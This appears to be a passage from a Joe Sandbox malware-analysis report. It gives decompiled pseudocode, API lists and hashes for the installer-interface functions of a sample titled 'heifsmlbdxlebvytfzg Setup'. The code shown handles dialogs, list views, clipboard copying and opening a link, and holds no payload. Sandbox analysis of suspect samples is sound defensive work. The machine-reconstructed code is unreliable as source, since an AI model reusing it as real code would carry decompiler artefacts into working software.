													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,00000001), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32 ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32 ref: 0040484C
SendMessageA.USER32 ref: 00404858
SendMessageA.USER32 ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32 ref: 0040489A
SendMessageA.USER32 ref: 004048A6
SendMessageA.USER32 ref: 0040493B
SendMessageA.USER32 ref: 00404966
SendMessageA.USER32 ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32 ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32 ref: 00404ACB
SendMessageA.USER32 ref: 00404B30
SendMessageA.USER32 ref: 00404B45
SendMessageA.USER32 ref: 00404B69
SendMessageA.USER32 ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32 ref: 00404C24
SendMessageA.USER32 ref: 00404CCD
SendMessageA.USER32 ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

, xrefs: 00404D34
N, xrefs: 00404A06
M, xrefs: 00404922
p>u, xrefs: 004047A7

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$p>u
API String ID: 1638840714-1575846375
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F61 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420498;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x753e70
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32 ref: 00405035
SendMessageA.USER32 ref: 00405046
SendMessageA.USER32 ref: 00405059
SendMessageA.USER32 ref: 00405067
SendMessageA.USER32 ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32 ref: 004050E1
SendMessageA.USER32 ref: 004050FA
SendMessageA.USER32 ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(00000000,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32 ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32 ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32 ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32(00000001,00000000), ref: 004052D2
CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8

Strings

{, xrefs: 004051C7
p>u, xrefs: 00404FA1

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: p>u${
API String ID: 590372296-1258388457
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00403964 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "heifsmlbdxlebvytfzg Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32 ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32 ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32 ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32 ref: 00403C75
SendMessageA.USER32 ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,heifsmlbdxlebvytfzg Setup), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Strings

heifsmlbdxlebvytfzg Setup, xrefs: 00403CA2

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: heifsmlbdxlebvytfzg Setup
API String ID: 184305955-4100266025
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
